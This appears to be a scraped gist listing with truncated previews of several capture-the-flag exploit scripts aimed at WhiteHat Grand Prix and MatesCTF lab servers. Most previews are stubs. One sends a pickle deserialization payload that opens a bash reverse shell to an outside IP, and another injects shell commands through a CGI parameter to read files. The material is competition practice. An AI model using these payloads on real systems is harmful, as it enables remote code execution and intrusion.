This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import time | |
# p = Pwn(host='lab9b.grandprix.whitehatvn.com',port=1337) | |
# p = Pwn(port=1337) | |
def exploit(): | |
cmd = 'cat flag.txt >&4;ls -lia >&4;' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import time | |
from capstone import * | |
p = Pwn(host='lab8.grandprix.whitehatvn.com',port=1337) | |
def xor(msg): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import time | |
def exploit(): | |
# raw_input('Debug>') | |
while 1: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib, urllib2 | |
import string | |
import socket | |
url = 'http://lab5b.grandprix.whitehatvn.com/cgi-bin/web13377331.py?input=0x1337' | |
flag = '' | |
regex_fail = 'yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyX' | |
i = 1 | |
charset = string.letters + string.digits + '_' | |
while 1: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import urllib, urllib2 | |
import pickle | |
url = 'http://lab13.grandprix.whitehatvn.com/b3acec105de421e136aad4024ee45b63.php?data=' | |
shell = "cos\nsystem\n(S'bash -i >& /dev/tcp/128.199.171.28/8081 0>&1'\ntR." | |
tmp = url + urllib.quote_plus(shell) | |
req = urllib2.urlopen(tmp) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import requests | |
cmd ='printf "%s|" /*' | |
# cmd = 'printf "%s|" /Sup3r_S3cr37_15_H3r3' | |
for i in xrange(400): | |
a = requests.get('http://lab4b.grandprix.whitehatvn.com/cgi-bin/counter?hit=`a=$('+cmd+'); b=${a:'+str(i)+':1}; printf "%d" "\'$b"> /run/cgicounter`;') | |
print chr(int(a.text.split(" ")[1].split("}")[0])), | |
''' | |
for fd in xrange(100): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
p = Pwn(mode = 1,host='lab02.matesctf.org',port=4231) | |
# p = Pwn(mode=1) | |
def exploit(): | |
p.connect() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
p = Pwn(mode = 1,host='lab03.matesctf.org',port=4321) | |
# p = Pwn(mode=1) | |
def exploit(): | |
p.connect() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import time | |
p = Pwn(host='lab01.matesctf.org',port=4001) | |
def login(buf): | |
p.read_until('>') |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# Author : peternguyen | |
from Pwn import * | |
import time | |
import re | |
# p = Pwn(elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') | |
p = Pwn(host='lab01.matesctf.org',port=1337,elf='./pwn300_17eca9c392e17ed1c4b51f7a1913832b') |